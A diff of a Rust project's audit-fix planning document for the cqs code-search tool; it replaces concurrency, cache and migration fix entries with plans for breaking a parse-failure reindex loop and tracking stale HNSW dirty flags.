-                     VALUES (?, ?, ?, ?, ?)",
-                )
-                .bind(&custom_id)
-                .bind(&text)
-                .bind(&model)
-                .bind(&purpose)
-                .bind(&now)
-                .execute(&pool)
-                .await
-            });
-            if let Err(e) = result { /* ... */ }
-        })
-    }
-```
-
-### Replacement
-
-Move the streamed inserts through a buffered queue drained under `begin_write()`. Spawn a single drain task that reads from a `Mutex<Vec<(custom_id, text)>>` flushed every ~200ms or when 64 entries accumulate.
-
-```rust
-    pub fn stream_summary_writer(
-        &self,
-        model: String,
-        purpose: String,
-    ) -> crate::llm::provider::OnItemCallback {
-        use std::sync::Arc;
-        // Buffered queue: streamed callbacks push into this Vec; a drain
-        // task flushes under begin_write() so all writes serialize through
-        // WRITE_LOCK like every other Store mutation. The mutex is local to
-        // this writer instance — concurrent stream_summary_writer calls get
-        // their own queues.
-        let queue: Arc<std::sync::Mutex<Vec<(String, String)>>> =
-            Arc::new(std::sync::Mutex::new(Vec::new()));
-        let rt = Arc::clone(&self.rt);
-        let pool = self.pool.clone();
-        let write_lock = self.write_lock(); // assuming a getter for WRITE_LOCK Arc<Mutex<()>>
-        let queue_drain = Arc::clone(&queue);
-        let model_drain = model.clone();
-        let purpose_drain = purpose.clone();
-
-        // Spawn drain thread; flushes at most every 200ms or when 64 items
-        // queued. Exits when queue is dropped (Arc strong_count reaches 1).
-        rt.spawn(async move {
-            loop {
-                tokio::time::sleep(std::time::Duration::from_millis(200)).await;
-                let drained: Vec<(String, String)> = {
-                    let mut q = queue_drain.lock().unwrap_or_else(|p| p.into_inner());
-                    if q.is_empty() {
-                        if Arc::strong_count(&queue_drain) == 1 { break; }
-                        continue;
-                    }
-                    std::mem::take(&mut *q)
-                };
-                let _g = write_lock.lock().await;
-                let now = chrono::Utc::now().to_rfc3339();
-                let mut tx = match pool.begin().await {
-                    Ok(t) => t,
-                    Err(e) => {
-                        tracing::warn!(error = %e, "stream_summary_writer drain begin failed");
-                        continue;
-                    }
-                };
-                for (custom_id, text) in drained {
-                    let _ = sqlx::query(
-                        "INSERT OR IGNORE INTO llm_summaries \
-                         (content_hash, summary, model, purpose, created_at) \
-                         VALUES (?, ?, ?, ?, ?)",
-                    )
-                    .bind(&custom_id)
-                    .bind(&text)
-                    .bind(&model_drain)
-                    .bind(&purpose_drain)
-                    .bind(&now)
-                    .execute(&mut *tx)
-                    .await;
+// src/cli/watch/reindex.rs:308-314
+                    file_chunks
                 }
-                let _ = tx.commit().await;
+                Err(e) => {
+                    tracing::warn!(path = %abs_path.display(), error = %e, "Failed to parse file");
+                    vec![]
+                }
             }
-        });
-
-        Box::new(move |custom_id: &str, text: &str| {
-            let mut q = queue.lock().unwrap_or_else(|p| p.into_inner());
-            q.push((custom_id.to_string(), text.to_string()));
-        })
-    }
 ```
 
-### Notes
+### Replacement / approach
 
-Requires exposing `WRITE_LOCK` accessor on `Store`. If not present, expose via `pub(crate) fn write_lock(&self) -> Arc<...>`. Verifier must check the lock implementation (sync `std::sync::Mutex` vs Tokio `Mutex`) and adjust accordingly. The above is a sketch — actual impl needs to match `begin_write()` signatures.
-
-If a full async drain is too invasive, an interim fix is to acquire WRITE_LOCK inside the callback before each insert (still per-row, but properly serialized). That's a smaller diff.
-
----
-
-## P2.61 — slot_remove TOCTOU on concurrent promote
-
-**Finding:** P2.61 in audit-triage.md
-**Files:** `src/cli/commands/infra/slot.rs:299-350`
-**Why:** Read active_slot → list_slots → remove_dir_all is non-atomic; concurrent promote can change active between steps, leaving system pointing at deleted slot.
-
-### Current code
-
-`src/cli/commands/infra/slot.rs:299-350` (excerpted):
+1. On parse failure, still touch `chunks.source_mtime` for this file so reconcile sees `disk == stored` and stops requeuing.
+2. Optionally also queue the file's chunks for deletion (matching the deleted-file branch at line 244-253) so a syntax-error file doesn't keep ghost results in search.
+3. Add a `parse_errors` counter to `WatchState` and surface it in `WatchSnapshot` so `cqs status --watch-fresh` shows stuck files.
 
 ```rust
-fn slot_remove(project_cqs_dir: &Path, name: &str, force: bool, json: bool) -> Result<()> {
-    let _span = tracing::info_span!("slot_remove", name, force).entered();
-    validate_slot_name(name)?;
-    let dir = slot_dir(project_cqs_dir, name);
-    if !dir.exists() {
-        let available = list_slots(project_cqs_dir).unwrap_or_default().join(", ");
-        anyhow::bail!(/*...*/);
-    }
-    let active = read_active_slot(project_cqs_dir).unwrap_or_else(|| DEFAULT_SLOT.to_string());
-    let mut all = list_slots(project_cqs_dir).unwrap_or_default();
-    all.retain(|n| n != name);
-    if name == active { /*...*/ }
-    fs::remove_dir_all(&dir)?;
-    /*...*/
-}
-```
-
-### Replacement
-
-Wrap the entire read-validate-mutate sequence in an exclusive lock on `.cqs/slots.lock`, mirroring `notes.toml.lock`:
-
-```rust
-fn slot_remove(project_cqs_dir: &Path, name: &str, force: bool, json: bool) -> Result<()> {
-    let _span = tracing::info_span!("slot_remove", name, force).entered();
-    validate_slot_name(name)?;
-
-    // Take an exclusive lock so concurrent slot_promote / slot_create /
-    // slot_remove can't race the read-validate-mutate sequence below.
-    let _slots_lock = cqs::slot::acquire_slots_lock(project_cqs_dir)?;
-
-    let dir = slot_dir(project_cqs_dir, name);
-    // ... rest unchanged
-}
-```
-
-Add `acquire_slots_lock` helper in `src/slot/mod.rs`:
-
-```rust
-/// Acquire an exclusive flock on `.cqs/slots.lock`. Held for the duration of
-/// any slot lifecycle operation (create/promote/remove) so concurrent calls
-/// across processes serialize. Lock file is created if missing.
-pub fn acquire_slots_lock(project_cqs_dir: &Path) -> Result<std::fs::File, SlotError> {
-    fs::create_dir_all(project_cqs_dir).map_err(|source| SlotError::Io {
-        slot: "slots.lock".to_string(),
-        source,
-    })?;
-    let path = project_cqs_dir.join("slots.lock");
-    let f = fs::OpenOptions::new()
-        .create(true)
-        .read(true)
-        .write(true)
-        .open(&path)
-        .map_err(|source| SlotError::Io {
-            slot: "slots.lock".to_string(),
-            source,
-        })?;
-    f.lock().map_err(|source| SlotError::Io {
-        slot: "slots.lock".to_string(),
-        source,
-    })?;
-    Ok(f)
-}
-```
-
-Apply the same `acquire_slots_lock` at the top of `slot_create` and `slot_promote`.
-
-### Notes
-
-`std::fs::File::lock()` is Rust 1.89+, MSRV 1.95 covers it. Rolls together P2.62 and P2.34 (same TOCTOU class). Add a regression test that spawns two threads, each calls `slot_remove` and `slot_promote` for the same target, asserts no orphaned active_slot pointer.
-
----
-
-## P2.62 — Slot legacy migration moves live WAL/SHM
-
-**Finding:** P2.62 in audit-triage.md
-**Files:** `src/slot/mod.rs:511-624`
-**Why:** Migration moves `index.db-wal`/`-shm` without checkpointing first. Cross-device fallback is non-atomic — interrupt mid-copy can leave new index.db without WAL, SQLite then truncates uncommitted pages.
-
-### Current code
-
-`src/slot/mod.rs:511-545` (start of `migrate_legacy_index_to_default_slot`):
-
-```rust
-pub fn migrate_legacy_index_to_default_slot(project_cqs_dir: &Path) -> Result<bool, SlotError> {
-    let _span = tracing::info_span!(
-        "migrate_legacy_index_to_default_slot",
-        cqs_dir = %project_cqs_dir.display()
-    )
-    .entered();
-    if !project_cqs_dir.exists() { return Ok(false); }
-    let slots_dir = slots_root(project_cqs_dir);
-    if slots_dir.exists() { return Ok(false); }
-    let legacy_index = project_cqs_dir.join(crate::INDEX_DB_FILENAME);
-    if !legacy_index.exists() { return Ok(false); }
-    let dest = slot_dir(project_cqs_dir, DEFAULT_SLOT);
-    fs::create_dir_all(&dest).map_err(/*...*/)?;
-    let migration_files = collect_migration_files(project_cqs_dir);
-    let mut moved: Vec<(PathBuf, PathBuf)> = Vec::new();
-    for src in &migration_files { /* move_file */ }
-    /* ... */
-}
-```
-
-### Replacement
-
-Insert a WAL-checkpoint step before the file moves so WAL is drained into main DB:
-
-```rust
-pub fn migrate_legacy_index_to_default_slot(project_cqs_dir: &Path) -> Result<bool, SlotError> {
-    let _span = tracing::info_span!(/*...*/).entered();
-    if !project_cqs_dir.exists() { return Ok(false); }
-    let slots_dir = slots_root(project_cqs_dir);
-    if slots_dir.exists() { return Ok(false); }
-    let legacy_index = project_cqs_dir.join(crate::INDEX_DB_FILENAME);
-    if !legacy_index.exists() { return Ok(false); }
-
-    // Drain any uncommitted WAL pages into the main DB before we move files.
-    // Without this, the move shuffles index.db, index.db-wal, and index.db-shm
-    // separately; a non-atomic copy + remove (the EXDEV cross-device fallback
-    // in move_file) can interrupt between index.db and index.db-wal, leaving
-    // the new slots/default/index.db without its WAL — SQLite then opens the
-    // partial DB and silently truncates the missing pages.
-    if let Err(e) = checkpoint_legacy_index(&legacy_index) {
-        // Non-fatal: the moves still proceed atomically on same-fs renames.
-        // On cross-device, the user accepts the remaining risk — log loudly.
-        tracing::warn!(
-            error = %e,
-            "Failed to checkpoint legacy index.db before migration; cross-device move \
-             may lose uncommitted WAL pages"
-        );
-    }
-
-    let dest = slot_dir(project_cqs_dir, DEFAULT_SLOT);
-    fs::create_dir_all(&dest).map_err(/*...*/)?;
-    /* unchanged */
-}
-
-/// Open the legacy DB and run `PRAGMA wal_checkpoint(TRUNCATE)` so the WAL
-/// sidecar is empty before the migration moves files. Closes the connection
-/// after the pragma so file handles don't leak into the move loop.
-fn checkpoint_legacy_index(legacy_index: &Path) -> Result<(), SlotError> {
-    let conn = rusqlite::Connection::open(legacy_index)
-        .map_err(|e| SlotError::Migration(format!("open legacy db: {e}")))?;
-    conn.pragma_update(None, "wal_checkpoint", "TRUNCATE")
-        .map_err(|e| SlotError::Migration(format!("checkpoint: {e}")))?;
-    Ok(())
-}
-```
-
-### Notes
-
-If `rusqlite` isn't a dep here, use `sqlx` via a small `tokio::runtime` block. Verifier should pick whichever matches local conventions. Also see P2.34 (rollback half-state) — same migration, related fix; ideally combined into one PR.
-
----
-
-## P2.63 — model_fingerprint Unix timestamp fallback
-
-**Finding:** P2.63 in audit-triage.md
-**Files:** `src/embedder/mod.rs:435-465`
-**Why:** Four error branches use `format!("{}:{}", repo, ts)` where ts changes per restart. Cross-slot copy by content_hash is broken; cache writes accumulate as orphans.
-
-### Current code
-
-`src/embedder/mod.rs:435-465` (excerpted):
-
-```rust
-                                Err(e) => {
-                                    tracing::warn!(error = %e, "Failed to stream-hash model, using repo+timestamp fallback");
-                                    let ts = std::time::SystemTime::now()
-                                        .duration_since(std::time::UNIX_EPOCH)
-                                        .unwrap_or_default()
-                                        .as_secs();
-                                    format!("{}:{}", self.model_config.repo, ts)
+                Err(e) => {
+                    tracing::warn!(
+                        path = %abs_path.display(),
+                        error = %e,
+                        "Failed to parse file — touching mtime to break reconcile loop",
+                    );
+                    // EH-V1.30.1-1: refresh source_mtime so reconcile.rs:124
+                    // sees disk == stored and stops re-queuing this file every
+                    // 30 s. The file stays unindexed (its previous chunks may
+                    // still serve from the index as ghosts — that's accepted
+                    // until the user fixes the syntax error and triggers a
+                    // re-parse). The mtime touch is the load-bearing piece.
+                    if let Ok(meta) = std::fs::metadata(&abs_path) {
+                        if let Ok(disk_mtime) = meta.modified() {
+                            if let Ok(d) = disk_mtime.duration_since(std::time::UNIX_EPOCH) {
+                                let mtime_ms = cqs::duration_to_mtime_millis(d);
+                                if let Err(touch_err) =
+                                    store.touch_source_mtime(rel_path, mtime_ms)
+                                {
+                                    tracing::warn!(
+                                        path = %rel_path.display(),
+                                        error = %touch_err,
+                                        "Failed to touch source_mtime for parse-failed file",
+                                    );
                                 }
                             }
                         }
                     }
-                }
-                Err(e) => {
-                    tracing::warn!(error = %e, "Failed to open model for fingerprint, using repo+timestamp fallback");
-                    let ts = std::time::SystemTime::now()
-                        .duration_since(std::time::UNIX_EPOCH)
-                        .unwrap_or_default()
-                        .as_secs();
-                    format!("{}:{}", self.model_config.repo, ts)
-                }
-            }
-        }
-        Err(e) => {
-            tracing::warn!(error = %e, "Failed to get model paths for fingerprint, using repo+timestamp fallback");
-            let ts = std::time::SystemTime::now()
-                .duration_since(std::time::UNIX_EPOCH)
-                .unwrap_or_default()
-                .as_secs();
-            format!("{}:{}", self.model_config.repo, ts)
-        }
-```
-
-### Replacement
-
-Replace the three timestamp fallbacks with a stable shape derived from repo + file size (when available) + a `:fallback` discriminator. Prefer file size when readable; fall back to repo only if size is unavailable.
-
-```rust
-/// Stable fallback fingerprint shape — must NOT include any value that
-/// changes across process restarts. Cross-slot embedding cache copy by
-/// content_hash relies on the model fingerprint matching across runs, so a
-/// per-restart timestamp fragments the cache and orphans every fallback
-/// embedding. File size is the lightest stable discriminator we can compute
-/// without re-reading the file; if even size is unavailable we still want a
-/// stable string so multiple fallback runs collide on the same key.
-fn fallback_fingerprint(repo: &str, model_path: Option<&Path>) -> String {
-    let size = model_path
-        .and_then(|p| std::fs::metadata(p).ok())
-        .map(|m| m.len())
-        .unwrap_or(0);
-    format!("{}:fallback:size={}", repo, size)
-}
-```
-
-Then at each of the three error sites:
-
-```rust
-                                Err(e) => {
-                                    tracing::warn!(
-                                        error = %e,
-                                        "Failed to stream-hash model, using stable fallback fingerprint"
-                                    );
-                                    fallback_fingerprint(&self.model_config.repo, Some(&model_path))
-                                }
-```
-
-```rust
-                Err(e) => {
-                    tracing::warn!(
-                        error = %e,
-                        "Failed to open model for fingerprint, using stable fallback fingerprint"
-                    );
-                    fallback_fingerprint(&self.model_config.repo, Some(&model_path))
+                    vec![]
                 }
 ```
 
-```rust
-        Err(e) => {
-            tracing::warn!(
-                error = %e,
-                "Failed to get model paths for fingerprint, using stable fallback fingerprint"
-            );
-            fallback_fingerprint(&self.model_config.repo, None)
-        }
-```
+`Store::touch_source_mtime(&Path, i64)` does not exist yet (verified — `grep -rn touch_source_mtime src/` returns nothing). Add it as a thin `UPDATE chunks SET source_mtime = ? WHERE origin = ?` wrapper next to `delete_by_origin` (`src/store/chunks/crud.rs:614`).
 
-### Notes
-
-Verifier must read the surrounding context to thread the actual `model_path` binding into the first two arms (the path is in scope at the inner Err arm because the outer match opened the file). P1.8 covers the same fingerprint failure as a separate finding — confirm both fixes converge to the same `fallback_fingerprint` helper.
-
----
-
-## P2.64 — Daemon serializes ALL queries through one Mutex
-
-**Finding:** P2.64 in audit-triage.md
-**Files:** `src/cli/watch.rs:1775-1858`
-**Why:** `Arc<Mutex<BatchContext>>` wraps the entire dispatch path. Slow query (LLM batch fetch, large gather) blocks every other reader. Deadlock surface with stream_summary_writer.
-
-### Current code
-
-`src/cli/watch.rs:1775`:
+**Critical:** the helper MUST call `crate::normalize_path(origin)` before binding to `WHERE origin = ?` — see `delete_by_origin` at `src/store/chunks/crud.rs:614-616` for the canonical pattern (`let origin_str = crate::normalize_path(origin);`). Without normalization the path-vs-origin string format won't match what the indexer stored (Windows `\\` vs Unix `/` separator, leading `./`, etc.) and the UPDATE will silently affect zero rows — defeating the entire fix.
 
 ```rust
-                let ctx = Arc::new(Mutex::new(ctx));
-```
+/// Refresh source_mtime on every chunk for `origin` without touching content.
+/// Used by the watch loop's parse-failure path so reconcile sees disk == stored
+/// and stops re-queuing files that the parser cannot handle.
+pub fn touch_source_mtime(&self, origin: &Path, mtime_ms: i64) -> Result<u32, StoreError> {
+    let _span = tracing::debug_span!("touch_source_mtime", origin = %origin.display()).entered();
+    let origin_str = crate::normalize_path(origin); // load-bearing — must match indexer's key format
 
-`src/cli/watch.rs:1853-1858`:
-
-```rust
-                            if let Err(e) = std::thread::Builder::new()
-                                .name("cqs-daemon-client".to_string())
-                                .spawn(move || {
-                                    handle_socket_client(stream, &ctx_clone);
-                                    in_flight_clone.fetch_sub(1, Ordering::AcqRel);
-                                })
-```
-
-### Replacement
-
-Convert the outer `Mutex<BatchContext>` to `RwLock<BatchContext>` — read-heavy paths (search, callers, stats) take `read()`; mutation paths (sweep_idle_sessions, reload notes, set_pending_*) take `write()`.
-
-```rust
-                let ctx = Arc::new(std::sync::RwLock::new(ctx));
-```
-
-Then inside `handle_socket_client` (and the periodic sweep), pick the right lock kind. The sweep at `:1807-1812` becomes:
-
-```rust
-                    if last_idle_sweep.elapsed() >= idle_sweep_interval {
-                        if let Ok(mut ctx_guard) = ctx.try_write() {
-                            ctx_guard.sweep_idle_sessions();
-                        }
-                        last_idle_sweep = std::time::Instant::now();
-                    }
-```
-
-Inside `handle_socket_client`, `ctx.read()` for read-only dispatch, `ctx.write()` for mutators. This requires walking the dispatch table to classify each command.
-
-### Notes
-
-This is a non-trivial refactor — the verifier should treat it as a focused PR, not a sweep. Alternative phase 1: keep `Mutex` but split BatchContext into per-resource mutexes (sessions, notes cache, embedder). The audit names both options; pick based on remaining work pressure. State this trade-off explicitly in the PR description.
-
-If RwLock pivot is chosen, audit `stream_summary_writer` (P2.60) — its callbacks fire from outside the daemon thread, must NOT live inside the RwLock guard.
-
----
-
-## P2.65 — embedding_cache schema purpose conflation
-
-**Finding:** P2.65 in audit-triage.md
-**Files:** `src/cache.rs:159-171`
-**Why:** Cache PRIMARY KEY is `(content_hash, model_fingerprint)` — no `purpose` column distinguishing `embedding` vs `embedding_base`. Lookups can return wrong vector after #1040 enrichment overwrites only `embedding`.
-
-### Current code
-
-`src/cache.rs:159-178`:
-
-```rust
-            sqlx::query(
-                "CREATE TABLE IF NOT EXISTS embedding_cache (
-                    content_hash TEXT NOT NULL,
-                    model_fingerprint TEXT NOT NULL,
-                    embedding BLOB NOT NULL,
-                    dim INTEGER NOT NULL,
-                    created_at INTEGER NOT NULL,
-                    PRIMARY KEY (content_hash, model_fingerprint)
-                )",
-            )
-```
-
-### Replacement
-
-Schema migration: add `purpose` column (default `'embedding'`), include in PK. New rows MUST set purpose; old rows take the default.
-
-```rust
-            sqlx::query(
-                "CREATE TABLE IF NOT EXISTS embedding_cache (
-                    content_hash TEXT NOT NULL,
-                    model_fingerprint TEXT NOT NULL,
-                    purpose TEXT NOT NULL DEFAULT 'embedding',
-                    embedding BLOB NOT NULL,
-                    dim INTEGER NOT NULL,
-                    created_at INTEGER NOT NULL,
-                    PRIMARY KEY (content_hash, model_fingerprint, purpose)
-                )",
-            )
-            .execute(&pool)
+    self.rt.block_on(async {
+        let (_guard, mut tx) = self.begin_write().await?;
+        let result = sqlx::query("UPDATE chunks SET source_mtime = ?1 WHERE origin = ?2")
+            .bind(mtime_ms)
+            .bind(&origin_str)
+            .execute(&mut *tx)
             .await?;
-
-            // Idempotent migration for existing caches: ALTER TABLE if the
-            // column doesn't exist. SQLite ignores the ADD COLUMN if the
-            // table is fresh (the CREATE above already includes purpose).
-            sqlx::query(
-                "ALTER TABLE embedding_cache ADD COLUMN purpose TEXT NOT NULL DEFAULT 'embedding'"
-            )
-            .execute(&pool)
-            .await
-            .ok(); // ignore "duplicate column" error on already-migrated caches
-```
-
-Then update read/write sites: `read_batch`, `write_batch`, `evict()` queries — every site that touches the cache must bind `purpose`. Find all sites with `grep -n 'embedding_cache' src/cache.rs`.
-
-### Notes
-
-This is a cache schema migration — bumps embedding_cache schema version (separate from main `chunks` schema v22). Document in CHANGELOG. Old cache rows ALTER-defaulted to `'embedding'` is correct because `embedding_base` cache writes have never happened (the audit confirms PR #1040 only writes `embedding`). After this lands, writers that want to cache `embedding_base` pass `purpose='embedding_base'` and lookups disambiguate.
-
----
-
-## P2.66 — Cache evict() vs write_batch() race
-
-**Finding:** P2.66 in audit-triage.md
-**Files:** `src/cache.rs:354-460`
-**Why:** `evict()` holds `evict_lock` mutex; `write_batch()` does NOT. Under WAL, evict's BEGIN takes a snapshot; concurrent commit between SELECT-size and DELETE deletes just-inserted rows.
-
-### Current code
-
-`src/cache.rs:354-398` (`write_batch` opens a transaction without `evict_lock`):
-
-```rust
-    pub fn write_batch(
-        &self,
-        entries: &[(&str, &[f32])],
-        model_fingerprint: &str,
-        dim: usize,
-    ) -> Result<usize, CacheError> {
-        // ... no evict_lock acquisition ...
-        self.rt.block_on(async {
-            let mut tx = self.pool.begin().await?;
-            // ...
-        })
-    }
-```
-
-`src/cache.rs:408-416` (`evict` acquires `evict_lock`):
-
-```rust
-    pub fn evict(&self) -> Result<usize, CacheError> {
-        let _span = tracing::info_span!("cache_evict").entered();
-        let _guard = self
-            .evict_lock
-            .lock()
-            .unwrap_or_else(|poisoned| poisoned.into_inner());
-        self.rt.block_on(async { /* ... */ })
-    }
-```
-
-### Replacement
-
-Acquire `evict_lock` in `write_batch` too (same pattern):
-
-```rust
-    pub fn write_batch(
-        &self,
-        entries: &[(&str, &[f32])],
-        model_fingerprint: &str,
-        dim: usize,
-    ) -> Result<usize, CacheError> {
-        // DS-V1.30: hold evict_lock across writes too so concurrent evict()
-        // can't measure size, then delete rows committed by an in-flight
-        // write_batch between its SELECT and DELETE. Without this, a writer
-        // sees its INSERT succeed while a cross-session read sees a cache
-        // miss — silently re-embedding chunks the cache "should" have.
-        let _evict_guard = self
-            .evict_lock
-            .lock()
-            .unwrap_or_else(|poisoned| poisoned.into_inner());
-
-        let _span = tracing::info_span!(/* existing */).entered();
-        // ... rest unchanged
-    }
-```
-
-### Notes
-
-Per-batch lock is cheap. Verify naming (`evict_lock` field) by reading `EmbeddingCache` struct definition. If the lock name differs (e.g. `write_lock`), align. Add a regression test that spawns concurrent `write_batch` + `evict` and asserts no row written by `write_batch` is deleted by the racing `evict`.
-
----
-
-## P2.67 — reindex_files double-parses calls per chunk
-
-**Finding:** P2.67 in audit-triage.md
-**Files:** `src/cli/watch.rs:2815, 2930-2939`
-**Why:** Watch path uses `parse_file_all` (returns file-level `calls`), then re-runs `extract_calls_from_chunk` per chunk. Bulk pipeline already uses `parse_file_all_with_chunk_calls`. ~14k extra tree-sitter parses per repo-wide reindex.
-
-### Current code
-
-`src/cli/watch.rs:2815, 2930-2939`:
-
-```rust
-            match parser.parse_file_all(&abs_path) {
-                Ok((mut file_chunks, calls, chunk_type_refs)) => {
-                    /* ... */
-                    if let Err(e) = store.upsert_function_calls(rel_path, &calls) { /* ... */ }
-                    file_chunks
-                }
-                /* ... */
-            }
-        })
-        .collect();
-
-    /* ... */
-
-    // DS-2: Extract call graph from chunks (same loop), then use atomic upsert.
-    let mut calls_by_id: HashMap<String, Vec<cqs::parser::CallSite>> = HashMap::new();
-    for chunk in &chunks {
-        let calls = parser.extract_calls_from_chunk(chunk);
-        if !calls.is_empty() {
-            calls_by_id
-                .entry(chunk.id.clone())
-                .or_default()
-                .extend(calls);
-        }
-    }
-```
-
-### Replacement
-
-Switch the inner parse to `parse_file_all_with_chunk_calls`. The fourth tuple element is `Vec<(String, CallSite)>` keyed by absolute-path chunk id; rewrite ids using the same prefix-strip the watch path already does for `chunk.id`, then build `calls_by_id` from the returned chunk_calls without re-parsing.
-
-```rust
-            match parser.parse_file_all_with_chunk_calls(&abs_path) {
-                Ok((mut file_chunks, calls, chunk_type_refs, chunk_calls)) => {
-                    /* path rewrite block unchanged */
-                    let abs_norm = cqs::normalize_path(&abs_path);
-                    let rel_norm = cqs::normalize_path(rel_path);
-                    for chunk in &mut file_chunks {
-                        chunk.file = rel_path.clone();
-                        if let Some(rest) = chunk.id.strip_prefix(abs_norm.as_str()) {
-                            chunk.id = format!("{}{}", rel_norm, rest);
-                        }
-                    }
-                    if !chunk_type_refs.is_empty() {
-                        all_type_refs.push((rel_path.clone(), chunk_type_refs));
-                    }
-                    if let Err(e) = store.upsert_function_calls(rel_path, &calls) { /* ... */ }
-                    // Stash chunk-level calls keyed by the post-rewrite chunk id.
-                    for (abs_chunk_id, call) in chunk_calls {
-                        let chunk_id = match abs_chunk_id.strip_prefix(abs_norm.as_str()) {
-                            Some(rest) => format!("{}{}", rel_norm, rest),
-                            None => abs_chunk_id,
-                        };
-                        per_file_chunk_calls.push((chunk_id, call));
-                    }
-                    file_chunks
-                }
-                /* ... */
-            }
-```
-
-Replace the per-chunk `extract_calls_from_chunk` loop with a fold over the collected `per_file_chunk_calls`:
-
-```rust
-    let mut calls_by_id: HashMap<String, Vec<cqs::parser::CallSite>> = HashMap::new();
-    for (chunk_id, call) in per_file_chunk_calls {
-        calls_by_id.entry(chunk_id).or_default().push(call);
-    }
-```
-
-### Notes
-
-`per_file_chunk_calls` needs to be a top-level `Vec<(String, CallSite)>` accumulator outside the `flat_map`, or threaded via `(file_chunks, Vec<(String, CallSite)>)` tuples. Inspect actual loop shape in watch.rs before applying — the `.collect()` at line 2866 may need restructuring.
-
----
-
-## P2.68 — reindex_files watch path bypasses global EmbeddingCache
-
-**Finding:** P2.68 in audit-triage.md
-**Files:** `src/cli/watch.rs:2876-2887` vs `src/cli/pipeline/embedding.rs:39-62`
-**Why:** Watch path only checks `store.get_embeddings_by_hashes`; never sees the per-project `EmbeddingCache` from #1105. File saves in watch mode pay GPU cost for every chunk not in current slot's `chunks.embedding`.
-
-### Current code
-
-`src/cli/watch.rs:2876-2887`:
-
-```rust
-    // Check content hash cache to skip re-embedding unchanged chunks
-    let hashes: Vec<&str> = chunks.iter().map(|c| c.content_hash.as_str()).collect();
-    let existing = store.get_embeddings_by_hashes(&hashes)?;
-
-    let mut cached: Vec<(usize, Embedding)> = Vec::new();
-    let mut to_embed: Vec<(usize, &cqs::Chunk)> = Vec::new();
-    for (i, chunk) in chunks.iter().enumerate() {
-        if let Some(emb) = existing.get(&chunk.content_hash) {
-            cached.push((i, emb.clone()));
-        } else {
-            to_embed.push((i, chunk));
-        }
-    }
-```
-
-### Replacement
-
-Plumb `Option<&EmbeddingCache>` through `cmd_watch` → `WatchConfig` → `reindex_files`. Replace the manual two-tier check with `prepare_for_embedding` from the bulk pipeline:
-
-```rust
-    use crate::cli::pipeline::embedding::prepare_for_embedding;
-    let prep = prepare_for_embedding(
-        &chunks,
-        store,
-        config.global_cache, // Option<&EmbeddingCache>
-        embedder.model_fingerprint(),
-        embedder.dim(),
-    )?;
-    let cached = prep.cached;
-    let to_embed = prep.to_embed;
-```
-
-(Adapt to the actual `prepare_for_embedding` return shape — read `src/cli/pipeline/embedding.rs:39-82` to confirm the API.)
-
-### Notes
-
-This consolidates P2.67, P2.68, P3.41, P3.42, P3.46 — all watch reindex hot path issues. Verifier may bundle as one PR. The `WatchConfig` struct at `src/cli/watch.rs:572` needs a new field for the global cache. Lifetime threading: `EmbeddingCache` is owned by `cmd_watch`, borrowed for the watch loop's lifetime — straightforward.
-
----
-
-## P2.69 — wrap_value deep-clones via serde round trip
-
-**Finding:** P2.69 in audit-triage.md
-**Files:** `src/cli/json_envelope.rs:160-176`
-**Why:** `serde_json::to_value(Envelope::ok(&payload))` walks the entire payload tree and rebuilds it. ~30KB allocator churn per gather call at 100 QPS = ~3MB/s pointless allocations.
-
-### Current code
-
-`src/cli/json_envelope.rs:160-176`:
-
-```rust
-pub fn wrap_value(payload: &serde_json::Value) -> serde_json::Value {
-    serde_json::to_value(Envelope::ok(payload)).unwrap_or_else(|e| {
-        tracing::warn!(error = %e, "wrap_value: envelope serialization failed; emitting fallback shape");
-        let owned = payload.clone();
-        serde_json::json!({
-            "data": owned,
-            "error": null,
-            "version": JSON_OUTPUT_VERSION,
-        })
+        tx.commit().await?;
+        Ok(result.rows_affected() as u32)
     })
 }
 ```
 
-### Replacement
+### Verification
 
-Build the envelope as a `serde_json::Map` directly. The shallow clone of the outer payload is unavoidable when callers pass `&Value`; a follow-on can make `wrap_value` take `Value` by value to drop even that.
+- `cargo build --features gpu-index`.
+- `cargo test --features gpu-index --lib store -- touch_source_mtime` (add a unit test that asserts `rows_affected > 0` for a chunk inserted with the indexer's normalized origin format).
+- Smoke: introduce a syntax error in a watched file (`echo 'fn foo(' > foo.rs`); observe one warn line then no further requeue spam in `journalctl`. Fix the syntax error, file gets reindexed.
+
+---
+
+## P2: EH-V1.30.1-8 — watch reindex failure leaves HNSW dirty without observability
+
+**Reframed during verification:** original title said `try_init_embedder Err leaves HNSW dirty`, but `try_init_embedder` returns `Option<Embedder>` (`None`, not `Err`) and the actual scope is the dirty-flag path at `events.rs:178-185` plus the `reindex_files` Err arm at line 419-421. Title and Why now describe the real symptom: a failed reindex cycle (SQLite busy, OOM, etc.) sets the dirty flag, the `Err` branch only emits a warn, and `clear_hnsw_dirty_with_retry` is never reached so the flag stays set indefinitely.
+
+**Files:** `src/cli/watch/events.rs:178-185` (dirty-flag set), `src/cli/watch/events.rs:419-421` (reindex_files Err arm)
+**Effort:** ~30 minutes
+**Why:** `set_hnsw_dirty(true)` runs at `events.rs:178-185` before every reindex attempt. When `reindex_files` returns `Err` (e.g. SQLite busy, panic, OOM), the match arm at line 419-421 just emits `warn!("Reindex error")` and returns — the matching `clear_hnsw_dirty_with_retry` (at line 364, only on the Ok path) never fires. There's no operator visibility into "we've been dirty for N cycles in a row" — each failed cycle just emits a warn and moves on.
+
+### Current code
 
 ```rust
-pub fn wrap_value(payload: &serde_json::Value) -> serde_json::Value {
-    // PF-V1.30: build the envelope as a Map directly. Previously we ran the
-    // payload through `serde_json::to_value(Envelope::ok(&payload))` which
-    // walks the inner tree and rebuilds every Map/Vec — a deep clone
-    // disguised as a re-serialization round trip. The hot-path daemon
-    // dispatch wraps tens of KB per query at hundreds of QPS, so the
-    // deep clone is real allocator pressure.
-    let mut env = serde_json::Map::with_capacity(3);
-    env.insert("data".to_string(), payload.clone());
-    env.insert("error".to_string(), serde_json::Value::Null);
+// src/cli/watch/events.rs:178-185
+    if let Err(e) = store.set_hnsw_dirty(cqs::HnswKind::Enriched, true) {
+        tracing::warn!(error = %e, "Cannot set enriched HNSW dirty flag — skipping reindex to prevent stale index on crash");
+        return;
+    }
+    if let Err(e) = store.set_hnsw_dirty(cqs::HnswKind::Base, true) {
+        tracing::warn!(error = %e, "Cannot set base HNSW dirty flag — skipping reindex to prevent stale index on crash");
+        return;
+    }
+```
+
+### Replacement / approach
+
+1. Add a `consecutive_dirty_cycles: u32` field to `WatchState`.
+2. In the `reindex_files` `Err` arm (or wherever the dirty-clear call lives), increment the counter on failure and reset to 0 on the success path right after `clear_hnsw_dirty_with_retry`.
